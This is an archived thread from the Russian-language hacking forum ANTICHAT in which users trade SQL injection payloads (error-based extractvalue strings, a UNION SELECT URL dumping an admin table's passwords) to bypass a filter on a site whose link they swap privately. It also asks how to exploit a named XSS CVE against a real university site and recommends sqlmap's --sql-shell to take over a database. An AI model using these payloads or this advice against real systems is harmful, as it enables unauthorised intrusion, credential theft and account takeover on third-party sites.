ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.12.2013, 03:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 23349
Репутация:
45
|
|
Код:
Code:
name=%5c'or(extractvalue(1,concat(0x3a,user()))),1); -- w
А так ?
|
|
|
|

11.12.2013, 18:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 12404
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Код:
Code:
name=%5c'or(extractvalue(1,concat(0x3a,user()))),1); -- w
А так ?
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
|
|
|
|

11.12.2013, 22:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 23349
Репутация:
45
|
|
Сообщение от zombak18
zombak18 said:
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
Кроме name другие параметры проходят через фильтр?
Код:
Code:
email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()))),NOW());%23
Можно линк в лс?
|
|
|
|

11.12.2013, 23:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 12404
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Кроме name другие параметры проходят через фильтр?
Код:
Code:
email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()))),NOW());%23
Можно линк в лс?
чекни лс..
|
|
|
|

12.12.2013, 00:40
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме: 70640
Репутация:
0
|
|
Сообщение от zombak18
zombak18 said:
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
Убери пробел, это форум добавил.
|
|
|

12.12.2013, 01:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 12404
Репутация:
0
|
|
Сообщение от kingbeef
kingbeef said:
Убери пробел, это форум добавил.
Пропускает
если появляется другой символ кроме %5c сразу пропускает без ошибок..
|
|
|
|

12.12.2013, 12:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 77731
Репутация:
33
|
|
jquery cross site scripting - Кто слышал о таких уязвимостях? Что они из себя предстовляют? Может у кого есть примеры или мануал...
|
|
|
|

12.12.2013, 17:18
|
|
Новичок
Регистрация: 22.08.2007
Сообщений: 2
Провел на форуме: 14711
Репутация:
0
|
|
Всем привет.
Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
|
|
|

12.12.2013, 17:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 70690
Репутация:
-5
|
|
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
|
|
|
|

12.12.2013, 17:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 343026
Репутация:
391
|
|
Сообщение от Hapk
Hapk said:
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
забей скулю в SQLMAP. Раскрутит - запусти с параметром --sql-shell и делай запросы как тебе удобно)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|